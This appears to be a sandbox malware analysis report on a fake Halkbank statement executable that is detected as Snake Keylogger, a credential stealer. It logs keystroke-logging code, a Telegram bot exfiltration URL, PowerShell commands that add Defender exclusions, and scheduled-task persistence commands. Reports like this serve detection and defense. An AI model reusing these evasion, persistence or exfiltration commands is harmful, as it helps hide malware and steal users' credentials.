Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4552175226.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2153033541.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000A.00000002.2226559280.0000000002981000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4552175226.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4552175226.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71d
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71l
Source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_00ADD4A4	0_2_00ADD4A4
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D10088	0_2_04D10088
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D10078	0_2_04D10078
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07959FF8	0_2_07959FF8
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07953618	0_2_07953618
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07951DB8	0_2_07951DB8
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07951DAA	0_2_07951DAA
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07954328	0_2_07954328
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07953A50	0_2_07953A50
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07953A40	0_2_07953A40
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_07951980	0_2_07951980
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027AC3A8	9_2_027AC3A8
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027A80A8	9_2_027A80A8
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027A5628	9_2_027A5628
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027ACCF0	9_2_027ACCF0
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027A2DD1	9_2_027A2DD1
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027A8099	9_2_027A8099
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027A5624	9_2_027A5624
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027AC5C7	9_2_027AC5C7
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027ABC20	9_2_027ABC20
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027ABC10	9_2_027ABC10
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 9_2_027ACCE7	9_2_027ACCE7
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_00EFD4A4	10_2_00EFD4A4
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_072774A0	10_2_072774A0
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_0727A380	10_2_0727A380
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_0727EB80	10_2_0727EB80
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_07277492	10_2_07277492
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_0727A370	10_2_0727A370
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_07277160	10_2_07277160
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_07277170	10_2_07277170
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_0727EB72	10_2_0727EB72
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_07678E90	10_2_07678E90
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_07671D68	10_2_07671D68
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_076735C8	10_2_076735C8
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_07673A00	10_2_07673A00
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_076742D8	10_2_076742D8
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 10_2_076739F0	10_2_076739F0
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_0289C168	15_2_0289C168
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_028927B9	15_2_028927B9
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_0289CAB0	15_2_0289CAB0
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_02897E68	15_2_02897E68
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_02894F08	15_2_02894F08
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_02892DD1	15_2_02892DD1
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_0289CAAE	15_2_0289CAAE
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_0289B9DC	15_2_0289B9DC
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_0289B9E0	15_2_0289B9E0
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_02894EF8	15_2_02894EF8
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 15_2_02897E66	15_2_02897E66

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: invalid certificate

Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000000.2084811043.0000000000488000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehdNu.exe& vs Halkbank_Ekstre_20241022_081224_563756.exe
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2153033541.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Halkbank_Ekstre_20241022_081224_563756.exe
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2149894418.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Halkbank_Ekstre_20241022_081224_563756.exe
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2163524222.0000000007570000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Halkbank_Ekstre_20241022_081224_563756.exe
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Halkbank_Ekstre_20241022_081224_563756.exe
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Halkbank_Ekstre_20241022_081224_563756.exe
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4552490533.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Halkbank_Ekstre_20241022_081224_563756.exe
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4552201197.000000000041A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Halkbank_Ekstre_20241022_081224_563756.exe
Source: Halkbank_Ekstre_20241022_081224_563756.exe	Binary or memory string: OriginalFilenamehdNu.exe& vs Halkbank_Ekstre_20241022_081224_563756.exe

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Halkbank_Ekstre_20241022_081224_563756.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bAZAANr.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, h1u0KhLk9tom65UQqU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, h1u0KhLk9tom65UQqU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, h1u0KhLk9tom65UQqU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, h1u0KhLk9tom65UQqU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, h1u0KhLk9tom65UQqU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, h1u0KhLk9tom65UQqU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, olEOricPsCWqLv4XFi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, olEOricPsCWqLv4XFi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@2/2

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

File created: C:\Users\user\AppData\Roaming\bAZAANr.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

File created: C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp

Jump to behavior

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4557961517.0000000003AED000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Halkbank_Ekstre_20241022_081224_563756.exe

ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

File read: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bAZAANr.exe"
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bAZAANr.exe C:\Users\user\AppData\Roaming\bAZAANr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process created: C:\Users\user\AppData\Roaming\bAZAANr.exe "C:\Users\user\AppData\Roaming\bAZAANr.exe"
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bAZAANr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe"	Jump to behavior
